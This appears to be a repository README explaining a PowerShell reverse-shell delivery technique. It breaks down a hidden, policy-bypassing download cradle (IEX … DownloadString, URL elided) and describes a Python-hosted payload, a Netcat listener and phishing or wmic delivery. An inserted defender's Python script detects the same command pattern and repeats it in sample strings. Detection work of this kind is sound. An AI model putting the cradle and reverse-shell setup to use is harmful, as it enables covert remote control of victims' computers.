francose/windows_malware

What Does This Do?

  • NoP → No Profile (Speeds up execution)
  • NonI → Non-Interactive Mode
  • W Hidden → Hides the PowerShell Window
  • Exec Bypass → Bypasses Execution Policy (Runs scripts without restrictions)
  • IEX(New-Object Net.WebClient).DownloadString(...) → Downloads and executes reverse.ps1.

Attack Vector?

Delivered via phishing and script execution. It could also be embedded inside a wmic process call create command.
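
A defender's view of the switches and delivery path listed above, as an added example that is not part of this repository: a Python check that scores process command lines (for example from Sysmon Event ID 1 or Security Event 4688 logs) for this pattern. The prefix lengths, the alert threshold and the sample command lines are assumptions constructed for illustration.

```python
import re

# Parameter -> (shortest prefix assumed to be accepted by powershell.exe, required value)
PARAMS = {
    "noprofile": (3, None),
    "noninteractive": (3, None),
    "windowstyle": (1, "hidden"),
    "executionpolicy": (2, "bypass"),
}
ALIASES = {"ep": "executionpolicy"}
CRADLE = re.compile(r"\b(iex|invoke-expression)\b.*downloadstring\s*\(", re.I | re.S)
WMIC = re.compile(r"\bwmic(\.exe)?\s+process\s+call\s+create\b", re.I)

def indicators(cmdline):
    """Return the README's indicators found in one process command line."""
    low = cmdline.lower()
    if "powershell" not in low and "pwsh" not in low:
        return set()
    hits = set()
    tokens = low.replace('"', " ").replace("'", " ").split()
    for i, tok in enumerate(tokens):
        if tok[0] not in "-/":
            continue
        name = ALIASES.get(tok[1:], tok[1:])
        value = tokens[i + 1] if i + 1 < len(tokens) else ""
        for full, (minlen, want) in PARAMS.items():
            if len(name) >= minlen and full.startswith(name) and want in (None, value):
                hits.add(full)
    if CRADLE.search(cmdline):
        hits.add("download_cradle")
    if WMIC.search(cmdline):
        hits.add("wmic_launch")
    return hits

def is_alert(cmdline):
    """Alert only when the in-memory download is combined with stealth switches."""
    hits = indicators(cmdline)
    return "download_cradle" in hits and len(hits) >= 3

# Constructed sample command lines (URL elided exactly as in the README).
SAMPLES = [
    r'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString(...)"',
    r'wmic process call create "powershell -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString(...)"',
    r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(is_alert(s), sorted(indicators(s)))
```

The third sample shows why the switches alone are a weak signal: administrative scripts routinely use -NoProfile and -ExecutionPolicy Bypass, so the rule requires the download-and-execute pattern as well.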

This is for educational purposes; please do not use it for malicious purposes.

About

A Python HTTP server hosts a PowerShell reverse shell script. PowerShell downloads and executes it, connecting back to a Netcat listener. This exploits trusted system utilities for stealthy remote access.
